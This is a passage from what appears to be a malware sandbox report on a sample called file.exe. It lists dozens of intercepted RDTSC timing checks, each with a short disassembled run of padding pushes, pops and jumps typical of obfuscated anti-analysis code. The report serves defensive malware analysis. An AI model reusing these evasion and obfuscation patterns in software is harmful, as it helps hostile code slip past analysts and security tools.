0x00000058 push edx 0x00000059 jmp 00007F6074F511FAh 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5962 second address: CB599F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F6074D9F9F8h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 movsx edx, di 0x00000014 lea eax, dword ptr [ebp+1248A336h] 0x0000001a or edx, dword ptr [ebp+122D2194h] 0x00000020 nop 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jo 00007F6074D9F9E6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB599F second address: C93DA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F51207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b jnp 00007F6074F511FEh 0x00000011 nop 0x00000012 call dword ptr [ebp+122D267Dh] 0x00000018 jnp 00007F6074F5120Ch 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6074F51203h 0x00000026 ja 00007F6074F511F6h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE651B second address: CE6539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F6074D9F9E6h 0x0000000d jmp 00007F6074D9F9EFh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6539 second address: CE6562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F6074F511FCh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6074F51204h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6562 second address: CE658D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F6074D9F9EFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007F6074D9F9EBh 0x00000011 jo 00007F6074D9F9E6h 0x00000017 pop edi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE66F8 second address: CE6709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6074F511F6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6709 second address: CE6713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6074D9F9E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6713 second address: CE6733 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6074F511F6h 0x00000008 jmp 00007F6074F51200h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6733 second address: CE6746 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6074D9F9E6h 0x00000008 jnp 00007F6074D9F9E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6A1E second address: CE6A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6074F51206h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F6074F511FEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6A42 second address: CE6A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6B92 second address: CE6BA4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F6074F511F6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE700B second address: CE7015 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6074D9F9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7015 second address: CE7021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7021 second address: CE7027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7027 second address: CE7038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6074F511F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7038 second address: CE703C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE703C second address: CE704F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074F511FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF03E8 second address: CF03F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6074D9F9E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF06B7 second address: CF06BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF06BF second address: CF06C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF06C5 second address: CF06D2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6074F511F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0926 second address: CF0933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F6074D9F9E6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0933 second address: CF0967 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F6074F511FAh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F6074F51204h 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF00A5 second address: CF00A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF128B second address: CF12AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F4F608h 0x00000007 jo 00007F6074F4F5FEh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF6891 second address: CF68AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60745321B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF68AF second address: CF68B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF68B3 second address: CF68B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF6582 second address: CF65AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F6074F4F606h 0x0000000a jns 00007F6074F4F5F6h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF95C3 second address: CF95C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF95C7 second address: CF95EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F4F600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F6074F4F601h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF95EF second address: CF9614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F60745321B4h 0x0000000c jmp 00007F60745321AAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8FEB second address: CF9003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F6074F4F5FCh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9003 second address: CF9007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9007 second address: CF9019 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F6074F4F5FCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9176 second address: CF918C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F60745321A6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFAC4 second address: CFFADE instructions: 0x00000000 rdtsc 0x00000002 js 00007F6074F4F5F6h 0x00000008 jl 00007F6074F4F5F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F6074F4F5F6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFADE second address: CFFAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFAE2 second address: CFFAE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFEA78 second address: CFEA84 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60745321A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFF733 second address: CFF741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6074F4F602h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFF741 second address: CFF747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03872 second address: D03876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03876 second address: D038A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F60745321B9h 0x0000000c pop esi 0x0000000d js 00007F60745321ACh 0x00000013 jp 00007F60745321A6h 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D038A8 second address: D038B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D038B3 second address: D038B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02AB2 second address: D02ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02ABA second address: D02AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02AC0 second address: D02ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F6074F4F5F6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02CB1 second address: D02CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02F42 second address: D02F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02F48 second address: D02F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60745321AAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0308A second address: D03097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F6074F4F5FEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03097 second address: D030A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D030A1 second address: D030AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6074F4F5F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D031FA second address: D03200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03200 second address: D03206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03206 second address: D03213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F60745321A6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03213 second address: D0322A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F4F603h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0322A second address: D03245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60745321B7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0340D second address: D0342E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F6074F4F607h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0342E second address: D03432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05D69 second address: D05D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05D6D second address: D05D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05D76 second address: D05D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06030 second address: D06051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F60745321A6h 0x0000000a jmp 00007F60745321B2h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06051 second address: D06055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D9A2 second address: D0D9B0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F60745321A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D9B0 second address: D0D9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D9B6 second address: D0D9CB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60745321A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D9CB second address: D0D9E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F4F607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DB33 second address: D0DB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F60745321A6h 0x0000000a popad 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DFB8 second address: D0DFDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F4F606h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jne 00007F6074F4F5F6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E813 second address: D0E831 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60745321B4h 0x00000007 jl 00007F60745321A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E831 second address: D0E851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F4F604h 0x00000007 jo 00007F6074F4F5FEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E851 second address: D0E869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F60745321AFh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E869 second address: D0E899 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F4F602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6074F4F608h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EBD7 second address: D0EBF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60745321B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EBF5 second address: D0EBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EBFF second address: D0EC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60745321B9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13499 second address: D1349D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1349D second address: D134AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F60745321AAh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D137B9 second address: D137BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D138DE second address: D138EA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F60745321A6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13BD5 second address: D13BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13BDD second address: D13C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F60745321B9h 0x0000000d popad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1EB8C second address: D1EB9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F4F5FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1EE9F second address: D1EEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60745321B7h 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1EEC0 second address: D1EEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F1CA second address: D1F203 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F60745321B9h 0x0000000c pop eax 0x0000000d jnc 00007F60745321ACh 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007F60745321A6h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F203 second address: D1F225 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6074F4F5FCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007F6074F4F5F6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F225 second address: D1F229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F354 second address: D1F359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
